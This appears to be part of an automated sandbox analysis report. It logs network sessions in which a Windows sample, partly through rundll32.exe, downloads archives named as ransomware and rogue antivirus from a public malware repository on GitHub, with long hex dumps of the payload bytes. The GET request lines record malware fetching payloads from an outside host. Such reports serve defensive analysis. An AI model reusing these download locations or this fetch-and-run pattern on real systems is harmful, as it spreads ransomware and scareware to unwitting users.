                                                                                                                                                    2022-09-29 12:59:10 UTC16015INData Raw: ba 70 f1 f5 1c a2 09 3f 42 ac b6 f7 01 bd de 1a 34 16 76 79 f6 f1 96 4f 2d 96 bb 6a ba ec fc 6c cf a3 ce b0 15 c9 e4 c5 00 65 76 6e 8e 54 ff 6b e6 5b 98 18 8e f4 89 c3 90 05 07 0c 88 a5 2b 48 64 c5 77 c6 c8 3a f8 f2 92 9f bd c5 71 21 16 b0 c9 85 7f 94 2b f1 54 7c 8c 90 6e 83 83 72 c1 5a 5e b8 ab 18 cb 81 a5 cc 3c f6 64 7e ef 4b 7f ed db be 96 d7 03 e9 83 d3 fd 82 83 fc 8d 5c 99 cc 92 4a db dd 92 49 25 58 45 5d ca 6a 0f 3d f2 f9 f4 be 18 95 79 30 99 84 8f b8 c2 95 8c 1a 24 54 d6 b1 4f 3c 7a 9b 07 d4 3e 18 96 75 15 36 c2 df 3d 6c 92 bf 12 2c 49 63 b2 e1 f8 f6 13 1a d2 4c ba ee 8f e2 70 25 a1 90 3e 6e 7b 98 60 87 e1 7f ec 55 02 6f 44 56 08 84 df 00 34 93 ec dd 48 17 e9 84 85 7d 02 69 d1 87 25 d0 de 33 38 e8 48 7d 74 80 48 d2 c2 48 75 37 62 7a a2 f8 ea 7d e1
                                                                                                                                                    Data Ascii: p?B4vyO-jlevnTk[+Hdw:q!+T|nrZ^<d~K\JI%XE]j=y0$TO<z>u6=l,IcLp%>n{`UoDV4H}i%38H}tHHu7bz}
                                                                                                                                                    2022-09-29 12:59:10 UTC16031INData Raw: a0 73 97 98 67 27 15 ad 67 6e 70 cd 50 0b 8b cb 84 c0 82 fe c2 ae fb 9a 88 c1 22 72 f9 43 f9 77 c3 c5 d5 45 59 fa 88 31 8a f5 03 83 98 4c 0a 0b 95 1c 9d 64 64 23 1e 18 3d e4 d6 5a cd 59 ed b0 10 8c f7 f5 00 8d 8a bf e4 55 c2 d6 b9 1a 23 3e b2 7f fe 3f bb 79 54 a9 81 ea 99 5a be d9 eb 1f bf 28 18 80 70 85 02 93 46 b8 40 9b 45 81 75 97 4c f0 da 8f 17 f2 4b f9 ca c4 b8 1c f3 ba b7 80 d4 b1 5a b2 90 0f f8 d4 8a 1a 58 60 ce bb ec ae 88 1e 06 e6 d5 71 07 84 ec 63 7c 41 12 d9 9f e8 5d 7b df a4 ad a7 ba 6d a0 f2 01 0c 98 b1 09 f5 13 1c ee cd ab 18 0b d9 15 88 3f b6 48 da 7e 75 e5 04 9b 44 37 14 a2 0f 30 4b d0 b4 ec b7 ef 3e 69 c2 ed 15 20 ed b6 b4 46 f7 5e 24 37 d0 98 61 79 f6 62 ab ec 70 43 ae a1 4b 8d 52 f7 97 34 b3 c7 a4 a4 82 2e a3 eb 5c 32 88 80 55 62 ce 67
                                                                                                                                                    Data Ascii: sg'gnpP"rCwEY1Ldd#=ZYU#>?yTZ(pF@EuLKZX`qc|A]{m?H~uD70K>i F^$7aybpCKR4.\2Ubg
                                                                                                                                                    2022-09-29 12:59:10 UTC16047INData Raw: 41 7d 54 97 e6 78 f1 14 53 40 19 22 9e b1 6c 43 9b 73 a2 fe 9b 07 8f fc 10 96 ab 21 d4 86 23 d3 58 50 36 a5 25 73 82 1d 7a d2 3a f2 ac 30 1b 90 44 1d 2d 7e b1 72 c0 dd 63 b3 e6 67 24 1c cd 6b 94 ec e0 28 80 09 15 10 c8 b5 d7 4a f7 ea fd 1d c3 0a a2 25 4f 01 b0 4d ca a8 e8 ba dd 93 9e a2 39 ef bb 4d aa f3 ab 14 c1 50 9f 9e 77 56 b0 b1 2a 5d 34 6a 92 5b fc f2 2e d8 eb c0 88 38 9a e8 e6 e4 97 ba 8c 59 22 df 8e 04 22 b8 6a 8c b5 74 1e fc 62 35 76 42 83 35 b1 6e db 16 a1 9b 4f 31 a3 eb 54 e1 5e a1 90 68 10 48 05 47 6b fe 3d 29 5c 7a e4 48 cd 67 19 5b 40 a3 f0 22 02 fe b1 aa 2c 34 64 fe cc 8c fc c0 45 85 d2 e3 30 52 17 8c a0 4b 1d 38 a1 7a 72 5d 9e cb d5 49 22 af 99 12 b7 41 3e ba 54 cc 10 4e 9c 3c a4 09 87 b0 34 2f 41 2f bd a5 41 2a de 6c 13 cc dd 72 19 fb 74
                                                                                                                                                    Data Ascii: A}TxS@"lCs!#XP6%sz:0D-~rcg$k(J%OM9MPwV*]4j[.8Y""jtb5vB5nO1T^hHGk=)\zHg[@",4dE0RK8zr]I"A>TN<4/A/A*lrt
                                                                                                                                                    2022-09-29 12:59:10 UTC16063INData Raw: eb b7 7b 3f 63 68 22 0b 2d 1a 28 32 b3 4d 12 72 ee f4 1d 95 11 79 26 e3 49 79 84 17 5b ff 9b 45 9d 98 26 fa 07 5d db b9 a1 79 48 53 04 b5 2b dd ed b6 d7 94 94 4a ad de be ec b3 3a 86 28 5c 39 98 2b a5 ba 67 45 77 70 e6 5f a6 6d 2e 86 c2 ee 8d 77 02 c0 9f 0f 4c 44 de 6e 09 7f f7 8a 93 b5 40 20 0d 2b bb 97 16 71 09 44 7e f0 65 4b be dd b7 f2 01 69 21 8c bd e9 40 87 5b 15 3a cd 5e f9 36 1b aa af 58 9f da e9 02 0c 76 c2 9a fc 49 9c 26 bf 31 fd 83 d5 4b 2b de 83 5e 55 c6 2c 52 2a 31 87 3a 8b 70 a0 fc 66 4f 52 75 2d 2d 37 a9 a4 de 4d 74 9f a1 69 47 4e 66 47 a4 7e 2e b3 02 12 ee 17 f9 c8 28 a2 26 71 f6 ce 9f e9 52 17 c8 0a ed 23 49 1c e1 79 a9 6e f4 36 1e 67 1f f2 b9 72 35 2c b8 3a 59 b3 da c2 c9 6b 0c d0 32 66 b6 a3 ed c7 7f 3e 9a ee 49 9e ed e8 1a 3e 7d 9f 3d
                                                                                                                                                    Data Ascii: {?ch"-(2Mry&Iy[E&]yHS+J:(\9+gEwp_m.wLDn@ +qD~eKi!@[:^6XvI&1K+^U,R*1:pfORu--7MtiGNfG~.(&qR#Iyn6gr5,:Yk2f>I>}=
                                                                                                                                                    2022-09-29 12:59:10 UTC16079INData Raw: b0 ab f4 9d 3e 5f e3 af f6 72 d1 ff b1 c4 e2 90 0c ee 70 a7 16 fc 8e 24 2b 98 cd 3b 24 e1 a2 08 cc 05 b5 b6 88 47 64 b0 76 38 f4 b3 91 ce b5 50 32 aa 00 b3 da bb b0 f7 a2 e5 67 eb da 69 4e 47 2d b5 b2 4f 0c 58 76 6f 9b e7 9a 4e dd 11 dd 95 b7 c6 88 68 e8 c1 44 6d e4 5c 84 b1 85 94 35 2b 4b 5b f6 be e4 c0 76 e2 44 4e ac bf 9a b1 4b 52 84 af 4d 81 49 da d5 84 a1 9d 65 33 c9 9a 6e f8 3e c7 46 8f 0d cc bb ea 93 37 fe 44 11 c3 6c 0d 5f 40 1b 75 c3 63 fd 50 ac da b8 81 16 b5 94 e8 80 da b2 69 59 52 c1 aa 0b e8 7f e7 38 68 9b 8d 1f e4 1f c1 e6 af 92 c2 6e 66 da e1 e2 8d 07 9b 93 09 cc 46 f0 fe eb d6 92 64 eb 48 21 79 b2 8a ea 4b f7 9a 0e 67 a5 d7 17 30 d0 37 22 bd af 18 be 93 53 99 d3 08 4c a3 d3 6c a3 59 4e 4e b7 48 33 c2 1e 6e 51 a9 99 84 58 88 f1 75 81 d4 85
                                                                                                                                                    Data Ascii: >_rp$+;$Gdv8P2giNG-OXvoNhDm\5+K[vDNKRMIe3n>F7Dl_@ucPiYR8hnfFdH!yKg07"SLlYNNH3nQXu
                                                                                                                                                    2022-09-29 12:59:10 UTC16095INData Raw: 71 fa 4a e5 9c 55 11 92 de 01 79 29 54 b3 6e 8b 18 9b 8e b3 ac 40 41 08 74 26 a2 fd 14 52 60 5a 85 ef 88 63 fb 7a cc 00 c3 b3 34 ed c0 ef 9f 08 65 61 30 a6 95 27 d5 69 57 1e 8d 79 c1 32 19 dc 99 47 90 cd 9d 34 e9 9d 41 52 1a bf 9a 66 3e 22 20 81 f9 09 bc cd bd d9 66 6f a9 bb 48 bb e2 d1 0e 45 a0 3d 8f 8c 54 31 2b 90 63 ff 88 4f b9 4d 8c 30 6a b2 8c 45 ed 23 9d 23 b4 98 e7 57 40 fe f3 eb 5d 11 28 f9 c6 02 dc 2e f6 cf ce aa f9 d0 9e 50 19 d6 db bc 02 58 a5 a1 d6 5c 46 b8 92 82 0a 77 e0 1a 63 6d 2e 01 2d b6 00 f0 99 60 11 6d c5 c2 81 03 26 7a 4a fb bd 55 fe 0d f8 93 c6 07 05 cc c6 17 ba 3d 81 31 49 e4 a4 6c 7f a8 9a 5a 96 d3 0f 63 17 d8 d8 36 eb 7b 87 17 dd 20 d3 97 66 b0 06 e9 f2 60 1b d0 67 4e b9 17 93 b3 86 0b 1f 57 5e e4 f5 29 5b 2e 0f 2d 02 74 97 a9 06
                                                                                                                                                    Data Ascii: qJUy)Tn@At&R`Zcz4ea0'iWy2G4ARf>" foHE=T1+cOM0jE##W@](.PX\Fwcm.-`m&zJU=1IlZc6{ f`gNW^)[.-t
                                                                                                                                                    2022-09-29 12:59:10 UTC16111INData Raw: 43 60 ac a7 52 13 f3 f0 e9 29 fa 9a 21 2e fa 00 c9 33 85 0b fa 93 8e a0 5b fa f8 d1 0c b0 67 76 74 5f 80 67 20 7a 7b ab 7f aa d4 55 a8 89 ce b5 ca e7 71 60 97 a9 60 37 f4 73 1c ca bb 65 db 9e 98 8f 72 2a 75 66 9d 97 da 75 d4 45 94 ad 43 1d 97 f7 bf da 3f bb 2b 49 c2 fb df 72 69 72 5a 4d 03 77 e8 30 cc fc 1a d0 92 83 6c c2 71 0c 23 49 13 3b 8c 11 ce 77 c5 a1 48 6e c9 d7 60 2b b1 54 19 17 fb 6b 2c 29 0c c7 d0 ef f7 c1 75 3a 87 f6 65 a5 3a c0 1b 93 a7 ec 09 a4 f2 b5 d5 94 fe 23 51 1c f7 aa 78 99 4f 12 81 bb 7c 10 e5 88 67 e4 37 b7 e9 4b 46 94 b5 b7 5c d7 82 b3 14 38 99 89 cd 25 da e2 0b 76 2b 19 4a 7c bf 8f 1d eb a2 3c 51 40 b6 f8 85 f7 ab 89 47 1a 4f b2 33 39 f1 95 32 18 7f 3b a5 56 ee c7 de 15 4c ea b6 1f 8b 56 d9 49 90 14 f6 86 09 ad 6b 66 47 86 a0 04 b7
                                                                                                                                                    Data Ascii: C`R)!.3[gvt_g z{Uq``7ser*ufuEC?+IrirZMw0lq#I;wHn`+Tk,)u:e:#QxO|g7KF\8%v+J|<Q@GO392;VLVIkfG
                                                                                                                                                    2022-09-29 12:59:10 UTC16127INData Raw: 9a 06 eb 24 bf 88 6b ef 9b 66 b4 c9 52 25 14 f6 15 54 46 05 a3 57 82 12 cc 15 94 ff b2 d1 0d b1 f1 51 38 71 b4 46 1c a6 a8 57 b4 4e d6 8a 04 7d e1 6c ef 09 7f aa bd cb 86 b2 c4 d2 2f a7 5d bd 61 77 dd 09 5f 1b 06 3a 99 70 63 8c 1b ac 8d 97 e5 d4 89 5e c7 8c 08 1f e4 10 45 5a 89 38 44 01 90 ef f2 4d a7 a4 e5 d9 3e e4 3a dd d3 c4 aa 07 b4 9c e0 5f ac 9d 2d 4c 49 23 61 03 bd 76 f6 78 70 0f a3 59 9e c8 6a 6c 30 6b 6b 93 6a d8 01 0a a2 c5 61 24 50 23 b6 6c 1e f2 8c 48 5f 97 d6 36 e6 7f cd fe 3b 70 e7 c4 ef 37 bf 8d 23 8a 1f 85 15 64 a5 a5 45 fc 32 9a 32 bd b0 ac 4b 44 28 d5 39 2f f9 d8 b7 5d 0b 78 f2 9d 55 c8 b0 af 2c 9d 62 35 d8 9c 8e 16 56 bb 09 03 f1 34 b6 f7 6a a7 9e 09 d2 d3 90 c0 26 c5 44 42 75 57 77 5e 49 72 09 af 14 e9 16 d2 15 37 ae 3e 9a 31 3d 79 de
                                                                                                                                                    Data Ascii: $kfR%TFWQ8qFWN}l/]aw_:pc^EZ8DM>:_-LI#avxpYjl0kkja$P#lH_6;p7#dE22KD(9/]xU,b5V4j&DBuWw^Ir7>1=y
                                                                                                                                                    2022-09-29 12:59:10 UTC16143INData Raw: b6 73 89 05 f6 40 04 3e 0f b5 5c 16 70 69 73 87 48 f8 f3 bf b9 da b1 2e e3 29 bc b2 9e b3 5b 1b 9b d3 f5 56 df d6 81 ef 8d 83 87 bf be 50 b4 42 bc b3 5b 1f 8f 69 fb 83 7b 84 45 cf c6 eb 11 f3 eb 1a 5e 48 e9 9f 71 59 87 78 7b 6f b2 f2 ea 33 d9 10 98 77 8f ed 25 32 03 36 ff 21 0c 4a 89 9a c7 61 d7 74 c2 5b 2d 22 d9 08 5b 7d eb a8 e3 35 0e 78 9c 90 55 21 0c 85 e4 47 9d 48 c5 e7 8f 4f 5d e2 32 b2 d2 7e 9e 42 e9 91 ae ad 25 b2 f8 03 05 07 93 93 38 46 b3 68 1f 97 f4 ab aa fa da ec 88 91 ac 5e 7a 77 3f ab 55 a8 ad 95 18 e7 c7 52 06 06 15 69 54 86 c5 83 e7 f1 81 53 f8 6e 49 2a d8 3e db 69 29 4e 97 56 c3 9a 1d 77 7e dc f1 8e 46 6f 26 64 36 2c 70 71 e9 24 95 13 9d f9 06 27 46 d5 de d6 36 70 a9 25 f0 0c ab 58 ba 8b 24 cc f1 cf 8f 6d b3 24 ea 2d f0 de 1c 09 37 b9 bf
                                                                                                                                                    Data Ascii: s@>\pisH.)[VPB[i{E^HqYx{o3w%26!Jat[-"[}5xU!GHO]2~B%8Fh^zw?URiTSnI*>i)NVw~Fo&d6,pq$'F6p%X$m$-7
                                                                                                                                                    2022-09-29 12:59:10 UTC16153INData Raw: 63 28 74 f9 2f 9c 48 f8 62 93 2a c3 d9 25 41 89 3b 6f d2 e8 b3 ea 80 ca db 3b f5 cb 92 31 b1 1d 0e 0a cc 40 49 c1 48 0a d9 0e d6 e5 ef ef e3 8f 97 bb dd ee 0a 55 19 2f 99 42 da 1b bb 68 a9 b1 57 a1 87 5e 98 f2 3e 79 9e ce a9 fa 49 2c 0e a2 cb 47 db 87 8e 23 59 9e b8 d4 4e a5 62 30 77 80 37 86 4c 60 6b 9f 1b 2f fe c1 50 83 6a 41 66 d9 3f 4c 4e 4c dc ef e0 0a a3 f9 c7 2a 29 95 8f 43 d5 db d2 b8 3e 86 aa 13 07 4e cb f3 15 17 9a 5b 60 fd 63 80 fb 74 c7 f1 76 a0 38 4c 91 65 23 83 2d 68 85 c3 37 0c d1 50 2e dc a6 ba a4 a0 39 a7 06 1f 2e 39 b9 b4 92 52 7d 75 f6 4d 32 fa a8 60 59 02 ba 26 d3 03 11 f3 57 0f 10 ea dc ec 89 9d 7c 79 77 8d 42 ca 27 86 11 db e8 99 eb 91 94 26 de 40 2d c4 19 91 6c 50 45 a6 71 ad 2e 3e 11 ef e7 6f 49 72 7a f5 9c a9 29 d1 33 ea 53 8b 8b
                                                                                                                                                    Data Ascii: c(t/Hb*%A;o;1@IHU/BhW^>yI,G#YNb0w7L`k/PjAf?LNL*)C>N[`ctv8Le#-h7P.9.9R}uM2`Y&W|ywB'&@-lPEq.>oIrz)3S
                                                                                                                                                    2022-09-29 12:59:10 UTC16169INData Raw: 4f 39 4e 10 60 70 41 45 67 93 58 05 cc f5 a3 75 dd 89 6f 0d 4c a3 a9 77 11 0e 68 b5 0c 6f 3f 60 d2 91 c8 fc 80 b6 f5 d5 0b 7d 8c de 86 ec db 2a 12 96 d9 e3 f5 71 15 05 5b 41 d4 c6 48 7e dd 73 85 f4 f8 a0 f9 23 8a aa 60 bc aa f9 e8 d5 ef 41 b7 02 d8 a3 9c 81 46 4a fe e2 c4 f3 37 4d c1 e7 12 54 95 2f 2b 57 83 6a 23 ae f3 3d ff bb db 4c 8d a9 82 e5 a1 ac cb 51 fc 70 c8 97 06 d5 5d 28 66 8e b4 cd 60 44 8c 67 ce fe 05 9c bf 7d 5d 3c 3e 94 c0 64 b2 cb ce f9 5f ca f0 37 04 f5 28 ec 70 f5 15 90 bf 61 1d 05 b6 65 96 45 5c 8a f9 38 2c a5 08 8f 03 44 a1 90 a1 3c 29 66 20 4f 49 9f 69 ca 17 4b db 79 3a 8a 2d ff b3 80 ac 20 78 3b 3e 8a 41 b9 91 9a e1 ca 23 8a 4d fa 30 fe 67 ed c6 ee 84 91 84 ae 54 c2 e1 aa ec a3 cf 00 c9 72 c8 49 ff 79 d8 30 57 38 f7 9d ba 71 0d 65 f7
                                                                                                                                                    Data Ascii: O9N`pAEgXuoLwho?`}*q[AH~s#`AFJ7MT/+Wj#=LQp](f`Dg}]<>d_7(paeE\8,D<)f OIiKy:- x;>A#M0gTrIy0W8qe
                                                                                                                                                    2022-09-29 12:59:10 UTC16185INData Raw: d1 bb 70 50 7c df 75 64 51 a3 ed dd 76 56 5f b6 b1 f1 9e d2 d7 c2 83 c8 ba 94 92 8f cd 13 b1 cb e3 a5 fd bf b2 00 bb ab 17 f0 7e e9 ee bc 3d 73 f1 49 59 76 68 1e 64 31 18 d3 05 f6 36 af 57 69 08 34 d6 ce 6e 11 7f ae 44 bb 96 36 3a 31 e3 5a d5 5e c8 b3 fc 32 2c d6 c4 5c fd 93 59 71 ba c8 69 9f ea 96 86 a2 02 c0 1b 6e 1d 53 13 75 25 62 c7 12 44 b3 74 04 05 3a f3 52 aa ba cf ed ce 3c 00 80 74 d7 f7 0b 9b 49 d2 87 dd 0b f3 3c 11 2c 8c 71 17 ac f5 f4 00 65 4e 70 56 db 3d 6c ac 0f 70 ff ef fd 86 36 7b f9 cd 14 f1 0c 3e aa 6a ba 57 d4 ac 99 b4 e5 ac 11 65 39 1a ff a9 52 f3 d6 ea 37 ae 4f ec b0 28 be e9 25 82 1c 51 d5 06 13 b3 d9 a1 bc ec bf c7 1f c9 68 96 03 8c 86 11 27 ae 0c 2b 15 d5 46 11 ec 2a 31 8b d1 bf 54 b7 36 8f c4 cc 79 70 07 c9 ec f4 6d 00 6d ee bb 1d
                                                                                                                                                    Data Ascii: pP|udQvV_~=sIYvhd16Wi4nD6:1Z^2,\YqinSu%bDt:R<tI<,qeNpV=lp6{>jWe9R7O(%Qh'+F*1T6ypmm
                                                                                                                                                    2022-09-29 12:59:10 UTC16201INData Raw: dd c4 af 07 76 e8 47 8e e2 47 6e 48 b3 45 d7 c1 80 db 05 37 cb ce 8f 4f 2a 36 07 ac 92 bc dd af 64 34 07 15 83 c3 ba 80 05 a3 02 df 2e 97 ad 1f 7e c6 af 06 df f4 ef 08 4b f4 68 6a 0f 9a 39 d6 9f f7 66 a7 87 76 0b 27 b8 a2 6f b3 60 13 d3 80 3a e6 c1 1c 20 70 46 1f b8 14 6e e3 1a c9 2e 26 a2 9f 53 44 eb b4 d4 22 f8 14 e7 c9 80 c9 41 5a 03 c0 53 ec 6e 73 c8 57 0a 18 8f 03 e2 49 1a 7e 0c 0a 59 04 f3 ec 94 dc 33 71 d1 a5 77 2d 39 4e 2d 65 4a 7a 4c 88 0c 7f 66 60 db fe e9 78 b8 e6 a0 5a 0e c8 c4 62 5e a5 66 1e e3 49 95 e4 1f de ba f6 5d dc 34 38 c6 5a 3f ef 06 b7 c7 ad 42 15 d2 f8 1e 6d 53 1d 6a 84 37 c2 7d 76 1b 13 f5 97 60 ca b2 29 36 aa 65 6d 49 b1 8c 29 a9 f8 bf 50 92 5a 90 9e 82 d3 73 45 c9 57 67 65 90 e3 fc 74 f8 f9 0a 2e ca fd e4 7c ba d5 9e 2a 5e bf db
                                                                                                                                                    Data Ascii: vGGnHE7O*6d4.~Khj9fv'o`: pFn.&SD"AZSnsWI~Y3qw-9N-eJzLf`xZb^fI]48Z?BmSj7}v`)6emI)PZsEWget.|*^


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    89192.168.2.349752140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:11 UTC16211OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    9192.168.2.349712140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:51 UTC586OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    90140.82.121.3443192.168.2.349752C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:11 UTC16211INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:21 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:11 UTC16211INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    91192.168.2.349753185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:11 UTC16213OUTGET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    92185.199.108.133443192.168.2.349753C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:12 UTC16213INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1034690
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "cb139afe4c1955d7d4f5f579332cf5b73b6b41a8bade4f3525f8981ea9eb4a4c"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 0807:E97B:385959:3EF852:63359357
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:12 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6952-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456352.833018,VS0,VE214
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 50fe5084b4bbfe99cf4ffd994e18575c006a8880
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:12 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:12 UTC16214INData Raw: 50 4b 03 04 14 00 01 00 08 00 ea 63 c8 4e 15 34 5b be 10 c9 0f 00 81 0b 12 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4c 50 53 32 30 31 39 2e 65 78 65 ec d2 bd 62 0f 4a 20 02 12 e6 89 4d 18 db 9b 9b dc 10 ae 89 ba 6b bf 4c 81 2a cc b4 82 28 9f 20 07 bb 53 a7 78 f3 2a 58 30 eb c9 eb da e8 3e b8 db 0b 27 6b 8e bc 16 6f 81 74 e9 9e 43 a0 32 be 9d dd de ca e8 fe a6 ef 69 fe e3 7f da 29 bd 73 2b a9 ea a0 32 1b 74 2f c9 db 66 e4 65 eb 0f e5 29 e6 e4 b5 0b 26 ec d0 98 45 d0 1c 5a d1 f5 79 bc d8 62 a8 26 8c c3 e4 63 82 f2 86 11 ca c4 a8 76 03 a7 cb 3e 0b 8c 64 60 7b 93 9c a1 c0 f5 56 b8 92 ef 87 91 32 db c2 91 d2 90 e3 1b f4 a9 54 2f 97 37 85 a9 fb c5 b5 67 69 1a 4c af f5 05 f1 35 0c d0 b7 ad 42 3e fb 35 e8 f1 e8 c0 cf 21 be 38 51 be 0b ca 4b 54 a5 4c 9a c4
                                                                                                                                                    Data Ascii: PKcN4[Endermanch@LPS2019.exebJ MkL*( Sx*X0>'kotC2i)s+2t/fe)&EZyb&cv>d`{V2T/7giL5B>5!8QKTL
                                                                                                                                                    2022-09-29 12:59:12 UTC16230INData Raw: 9a a8 ac 0c 77 b7 0f 29 9a 2f fe fa e7 b3 0a f8 ed f0 86 7c 55 39 1d fb 43 d5 56 ee 65 00 1a bd ac 3d 4f e7 4f dd e6 bf 22 40 6a 32 92 ee 13 7e 39 61 d2 cc b8 7c df 17 3c fe 06 55 67 a2 80 7e 6e ec bc 01 e1 da 0a 04 c2 b3 f4 f9 f7 1e c4 27 bc c8 0f 14 16 8f d0 a5 2d be 4e 0d 1c aa 0e 1e cd d1 1b a0 41 4f ac be 96 20 21 c2 53 c1 62 f4 ff 75 66 3c fb c3 ae a9 c3 cf 20 b3 cb 00 57 ad 8f 90 d1 eb c7 6d 53 62 a4 3c 75 14 1b c3 55 e3 d9 a5 51 8a 87 bd 4e 25 b9 5d bf 51 6a 60 ea fd 1c 9c 5d 79 d7 b2 92 0a 34 8b af 5c 0e 2b 13 7f 3b e6 b1 95 14 b2 87 e1 e6 cb 9d 0a c6 56 33 3a 91 cc 52 2e 92 c4 6a f5 d3 f0 1f d8 ac 24 be 0e e2 09 4c e6 86 fe 3c b6 f9 21 14 8a 07 81 1a 5a 39 d3 c9 fe ee 97 fa 26 8b ba 36 88 73 70 e8 4f f3 54 d3 f1 c9 fe ed 71 81 21 15 40 2e 4c cd
                                                                                                                                                    Data Ascii: w)/|U9CVe=OO"@j2~9a|<Ug~n'-NAO !Sbuf< WmSb<uUQN%]Qj`]y4\+;V3:R.j$L<!Z9&6spOTq!@.L
                                                                                                                                                    2022-09-29 12:59:12 UTC16246INData Raw: b7 68 ef a7 3f 6e 83 c8 08 72 5a 39 5f 6a 2a c3 08 fb bb c5 96 ac de 2c 0a 25 8e 0f 6f 4e d2 12 98 a7 9c 38 97 de 6a 0f 5a 90 3e 0a 72 f7 ef ba 9d 29 2e 51 57 10 98 e3 64 cc 18 c5 0b 51 c7 4e d0 15 c3 47 ba cf 5e 7d 21 8c 06 9e da 61 aa 43 b6 1c 2e 5a 44 90 cf cd 2a 43 f4 6f cd 73 80 81 4a d3 2a 64 85 43 c8 63 25 7c 13 68 62 b3 eb a7 57 dc a0 ff c8 ac 5c 37 91 0b 36 98 fa 5a 67 cb 14 1d 2f da 3e 48 a4 74 2c 25 89 95 6d e4 99 7f ef 1c e6 2f d3 81 5a bd f3 1b 6c 6f 79 9c 41 98 53 52 80 62 de d1 6e a4 4b 61 e3 db 89 43 02 fc 6b 21 79 b6 04 68 5a fe cb 31 0e e7 96 53 5e 2f 69 18 95 49 e3 54 77 e7 09 e0 3f 0e e5 85 07 72 77 d4 d3 d2 d1 68 63 fb 18 38 2b b4 2c be 7d 2d 2b 78 97 cd 30 60 5b ba 27 48 f4 0e 6b dc 28 14 27 cb c7 08 f9 03 f1 4c 40 04 17 aa 3c 32 aa
